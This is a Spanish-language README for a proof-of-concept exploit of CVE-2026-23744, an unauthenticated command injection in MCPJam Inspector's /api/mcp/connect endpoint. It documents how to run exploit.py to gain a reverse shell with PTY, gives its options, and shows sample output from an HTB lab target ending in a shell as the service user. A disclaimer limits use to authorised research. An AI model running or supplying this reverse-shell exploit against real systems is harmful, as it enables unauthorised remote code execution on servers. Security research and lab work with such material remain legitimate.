
CVE-2026-23744 es una inyección de comandos no autenticada en MCPJam Inspector ≤1.4.2 a través de /api/mcp/connect. Este POC lo explota enviando una carga útil JSON diseñada para ejecutar comandos arbitrarios, otorgando una shell inversa con PTY.
Esta prueba de concepto se proporciona exclusivamente para investigación de seguridad autorizada, fines educativos y entornos de laboratorio controlados (p. ej., HTB, CTF o pruebas de penetración internas con consentimiento explícito por escrito). El uso no autorizado contra cualquier sistema sin permiso es ilegal y poco ético. El autor no asume ninguna responsabilidad por el mal uso; los usuarios son los únicos responsables de cumplir con todas las leyes y regulaciones aplicables.
CVE-2026-23744 es una vulnerabilidad de inyección de comandos no autenticada en MCPJam Inspector (versión ≤ 1.4.2).
El endpoint /api/mcp/connect acepta una carga útil JSON con serverConfig.command y serverConfig.args y los pasa directamente a la creación de un proceso del sistema sin ninguna sanitización. Un atacante puede enviar una solicitud manipulada para ejecutar comandos arbitrarios del sistema, obteniendo una reverse shell con los privilegios del usuario del servicio.
Este repositorio contiene un script de exploit completo y funcional con un listener interactivo automático opcional basado en PTY (habilitado por defecto).
requests (pip install requests)Importante: Proporcione solo el hostname o la IP. El script añade automáticamente http:// o https://
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
El script inicia su propio listener y le proporciona una shell directamente en su terminal.
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!
# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)
root.Este repositorio es solo para fines educativos y de pruebas autorizadas. Úselo bajo su propio riesgo.
Autor: amao26
Fecha: Agosto de 2026
| Opción | Descripción |
|---|
-t, --target | Hostname o IP del objetivo (obligatorio) |
-p, --port | Puerto del objetivo (por defecto: 6274) |
-l, --lhost | Su IP para la reverse shell (obligatorio) |
-r, --lport | Puerto de su listener (por defecto: 4444) |
--ssl | Usar HTTPS en lugar de HTTP |
--check-only | Solo comprobar la vulnerabilidad, sin enviar la shell |